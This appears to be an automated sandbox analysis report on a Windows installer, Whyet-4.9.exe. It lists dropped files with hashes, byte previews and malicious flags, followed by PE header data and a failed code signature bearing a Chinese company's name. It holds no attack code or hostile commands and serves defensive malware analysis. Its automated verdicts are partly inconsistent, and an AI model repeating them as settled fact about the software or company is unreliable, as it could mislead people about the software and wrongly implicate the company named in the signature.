SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu15wshk.2eh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twp5nk2n.lit.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2rlhesr.5m2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umtkmdw2.jxu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urdxaedj.0jm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ut01pxgw.1x5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbrdkrrm.czr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4wxkmkw.isd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yekev1qa.avt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpbypsbn.qu1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw1it40o.s4m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxzn10sg.ex1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzdbnn3a.rlq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 497x63, components 3
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	7.670995643119166
Encrypted:	false
SSDEEP:	48:o9YMAuERADl78E1g3e2OHBTTxE4+NaEIT9paYvo6su:gh7EQVXgt+NYgTnw6X
MD5:	3220A6AEFB4FC719CC8849F060859169
SHA1:	85F624DEBCEFD45FDFDF559AC2510A7D1501B412
SHA-256:	988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
SHA-512:	5C45EA8F64B3CDFB262C642BD36B08C822427150D28977AF33C9021A6316B6EFED83F3172C16343FD703D351AF3966B06926E5B33630D51B723709712689881D
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......?...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...T.)..{-.I.U..i..P.U....)..J..9..A@.(Lu..k...5R.T......}..E&..$.O.P}..@>.}..L....,.....t......c...ar.Z\.....R...7 .....z......k.OS.Q.'....r..?...4.x...P.G..y....L.........\|....;z.a.4......SL...S.!.d+.3.....w..)..i.....{.......Hi....)._.~..q/..Ji..v@<.....ne......j..q..Q.C..}G.L".5I!]........._E..")..*..1.....SM...qj...j1.+...n..M:..C..j.H.....;...N..

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPG

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS2 Windows, datetime=2008:07:08 14:20:15], baseline, precision 8, 166x312, components 3
Category:	dropped
Size (bytes):	29054
Entropy (8bit):	5.195708227193176
Encrypted:	false
SSDEEP:	384:wjV66AV66RU53DaYNg7y5fJ+dwd7L/dSivXHk4eo:wjs6As6R4aYyCfToi7R
MD5:	AC40DED6736E08664F2D86A65C47EF60
SHA1:	C352715BBF5AE6C93EEB30DF2C01B6F44FAEDAAA
SHA-256:	F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
SHA-512:	2FBD1C6190743EA9EF86F4CB805508BD5FFE05579519AFAFB55535D27F04F73AA7C980875818778B1178F8B0F7C6F5615FBF250B78E528903950499BBE78AC32
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS2 Windows.2008:07:08 14:20:15........................................8...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................U.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...J....X.Z..l.i.........jl....p............\\.I<...=..v.....(..A.%.P.'!."UI.I....z.u...wq..*..hc4kt.6R.7H.Z.[.#O..O

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	data
Category:	dropped
Size (bytes):	160825
Entropy (8bit):	5.9784583210372215
Encrypted:	false
SSDEEP:	3072:7AW0HGl6b15OHTuZZcwbMy1IrZ4+ofXXkkP:70uYfXUY
MD5:	5441EAEC8AC4B6BD62FC8E8182F86483
SHA1:	8269BB7887E2DA7FB16AB9CCABB3B1FBDC44C813
SHA-256:	A271066F9497D01F0E2B669D7519684057C9445DC28931D7CB2A178DE5A083EE
SHA-512:	D96BAE6E219976CA8CF2F0874AF8037A1FE34EC60F9F22DE2D5E8793923A584D6389C2B11C0BA193E063DE50B4BEDEBCCFD2B5219C941B3C0C1B41B5392F87CE
Malicious:	false
Reputation:	unknown
Preview:	........CGlobalIncludeLuaFile.........Constant Definitions..XMB_OK=0;..MB_OKCANCEL=1;..MB_ABORTRETRYIGNORE=2;..MB_YESNOCANCEL=3;..MB_YESNO=4;..MB_RETRYCANCEL=5;..MB_ICONNONE=0;..MB_ICONSTOP=16;..MB_ICONQUESTION=32;..MB_ICONEXCLAMATION=48;..MB_ICONINFORMATION=64;..MB_DEFBUTTON1=0;..MB_DEFBUTTON2=256;..MB_DEFBUTTON3=512;..IDOK=1;..IDCANCEL=2;..IDABORT=3;..IDIGNORE=5;..IDRETRY=4;..IDYES=6;..IDNO=7;..SW_HIDE=0;..SW_SHOWNORMAL=1;..SW_NORMAL=1;..SW_MAXIMIZE=3;..SW_MINIMIZE=6;..HKEY_CLASSES_ROOT=0;..HKEY_CURRENT_CONFIG=1;..HKEY_CURRENT_USER=2;..HKEY_LOCAL_MACHINE=3;..HKEY_USERS=4;..REG_NONE=0;..REG_SZ=1;..REG_EXPAND_SZ=2;..REG_BINARY=3;..REG_DWORD=4;..REG_DWORD_LITTLE_ENDIAN=4;..REG_DWORD_BIG_ENDIAN=5;..REG_LINK=6;..REG_MULTI_SZ=7;..REG_RESOURCE_LIST=8;..REG_FULL_RESOURCE_DESCRIPTOR=9;..REG_RESOURCE_REQUIREMENTS_LIST=10;..DLL_CALL_CDECL=0;..DLL_CALL_STDCALL=1;..DLL_RETURN_TYPE_INTEGER=0;..DLL_RETURN_TYPE_LONG=1;..DLL_RETURN_TYPE_STRING=2;..SUBMITWEB_POST=0;..SUBMITWEB_GET=1;..ACCESS_READ=1310

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Download File

Process:	C:\Users\user\Desktop\Whyet-4.9.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5153280
Entropy (8bit):	6.264110671248182
Encrypted:	false
SSDEEP:	49152:aYjdIw1TJyn5PPXDFFCMvSn/yRe4AloH1/coSNs5QKvbeGktKpGw+BbwPiBqkd96:SPZYxnMe4V/cJtKpGvJc5twG
MD5:	2A7D5F8D3FB4AB753B226FD88D31453B
SHA1:	2BA2F1E7D4C5FF02A730920F0796CEE9B174820C
SHA-256:	879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
SHA-512:	FA520EBF9E2626008F479C6E8F472514980D105F917C48AD638A64177D77C82A651C34ED3F28F3E39E67F12E50920503B66E373B5E92CF606BC81DC62A6B3EA4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5.....X.)......2......6......d/.........`...../..............".........4....d..+....d.......d+......d,.....Rich....................PE..d...3..O..........".......5...........%........@..............................P.....DAO...@.................................................H:H......pN.......K.\|H...........0O..,....................................................5.....87H.@....................text....5.......5................. ..`.rdata..*.....5.......5.............@..@.data.........H......vH.............@....pdata..\|H....K..J...~I.............@..@text....."....M..$....K.............@.. data.....K... N..L....K.............@..@.rsrc........pN......8L.............@..@.reloc.......0O.......L.............@..B........................................................................................................................................

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Download File

Process:	C:\Users\user\Desktop\Whyet-4.9.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	337224
Entropy (8bit):	6.4846248169411185
Encrypted:	false
SSDEEP:	6144:J8bKN/3dhtovc2LAmB7jQaHU9ZW5NpFaQIuHmc6/nEPn:JqKN/NhKEIzdjQaHUe7OaME
MD5:	958103E55C74427E5C66D7E18F3BF237
SHA1:	CEA3FC512763DC2BA1CFA9B7CB7A46AE89D9FCD8
SHA-256:	3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
SHA-512:	02ED6E1F24EF8F7F1C0377FA86A3A494B8A4474472AB7001F7902F2F3AFA6CD975DC69FCAB6F5524545A67657ECCCFCD4ED2C95431843E9D50F2FFF4C5178DBE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d...C\..g...d.......m...M...m.n.u...m.x.....m.i.e...m.j.e...Richd...........................PE..d....\mL.........." .........R..............................................p......w...............................................P.......`...(............ ...2......H....`.......................................................................................text...H........................... ..`.rdata..F...........................@..@.data...DA......."..................@....pdata...2... ...4..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\inst.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Reputation:	unknown
Preview:	..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.775363957833924
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Whyet-4.9.exe
File size:	21'152'435 bytes
MD5:	f317c17035501aaad0abfaf9fba4c085
SHA1:	f522fec1296c065cd4c3eaf52d1c4fbc26fd9f28
SHA256:	38622c32cac325c68f2fbf7148255a9813e7caeb53e3b95ebea56a6da5cb22ba
SHA512:	147e484e12adf36e9c3a446b3a08af2c274e4acdff04b2eb5a3164771b3eb9c7e1f15858289b7c19eabc97f99d06936ead9ff94ce05f892af45d757ac65a9d08
SSDEEP:	393216:OecgR96USu2VkX3mGZHoRJ3+j8yvn7lbt0lWL:kVHemGZMkT7lbt0YL
TLSH:	8D27015576F840EAD0BEC139C9828A4BD2F278451B35CBCF40941AA91F377E24D2EF69
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.V.P.V.P.V.P.M...i.P.M..._.P._..._.P.V.Q.2.P.M...O.P.M...W.P.M...W.P.RichV.P.........PE..d...L..O.........."......b.........

File Icon


Icon Hash:	a4a6849c8cc53581

Static PE Info

General

Entrypoint:	0x140002d1c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x4FDA0E4C [Thu Jun 14 16:16:12 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	357b59ff56f808887438b8bd8ad0eaa6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	05/01/2022 04:58:48 06/01/2024 04:58:48
Subject Chain	CN="Beijing Qihu Technology Co., Ltd.", O="Beijing Qihu Technology Co., Ltd.", STREET=\u671d\u9633\u533a\u9152\u4ed9\u6865\u8def6\u53f7\u96622\u53f7\u697c1\u81f319\u5c42104\u53f7\u51858\u5c42801, L=Beijing, S=Beijing, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=BEIJING, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=911101026662879416, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	5DA4F6891F78A8265529B5CF87F531E4
Thumbprint SHA-1:	D06DEB50E30A9CD6C8F5E50D48965B15E9DC6506
Thumbprint SHA-256:	0FA282A97203BB150EF9FAA375BA3FD0403F3C258DA21704B3CD3B646E61C1C6
Serial:	448ABF29B045823E5D6DCC0B

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F2A6CEA8EE0h
dec eax
add esp, 28h
jmp 00007F2A6CEA6D37h
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
dec eax
mov dword ptr [esp+18h], edi
inc ecx
push esp
dec eax
sub esp, 20h
dec esp
lea esp, dword ptr [00009324h]
xor esi, esi
xor ebx, ebx
dec ecx
mov edi, esp
cmp dword ptr [edi+08h], 01h
jne 00007F2A6CEA6F08h
dec eax
arpl si, ax
mov edx, 00000FA0h
inc esi
dec eax
lea ecx, dword ptr [eax+eax*4]
dec eax
lea eax, dword ptr [0000A232h]
dec eax
lea ecx, dword ptr [eax+ecx*8]
dec eax
mov dword ptr [edi], ecx
call dword ptr [000053FDh]
test eax, eax
je 00007F2A6CEA6F08h
inc ebx
dec eax
add edi, 10h
cmp ebx, 24h
jl 00007F2A6CEA6EABh
mov eax, 00000001h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
mov edi, dword ptr [esp+40h]
dec eax
add esp, 20h
inc ecx
pop esp
ret
dec eax
arpl bx, ax
dec eax
add eax, eax
dec ecx
and dword ptr [esp+eax*8], 00000000h
xor eax, eax
jmp 00007F2A6CEA6EBDh
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 20h
mov edi, 00000024h
dec eax
lea ebx, dword ptr [0000929Ch]
mov esi, edi
dec eax
mov ebp, dword ptr [ebx]
dec eax
test ebp, ebp
je 00007F2A6CEA6EFDh
cmp dword ptr [ebx+08h], 01h
je 00007F2A6CEA6EF7h

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaf7c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x1c85b	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xf000	0x5d0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1429663	0x2c50
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x22c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x61d3	0x6200	46565b91f365f59e95911f623cd509ca	False	0.5916374362244898	data	6.245804251873142	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x3948	0x3a00	9a2a098011201debfdbe2790cfc39397	False	0.3455010775862069	dBase III DBT, version number 0, next free block index 46396, 1st item "j\267"	4.71737238820107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
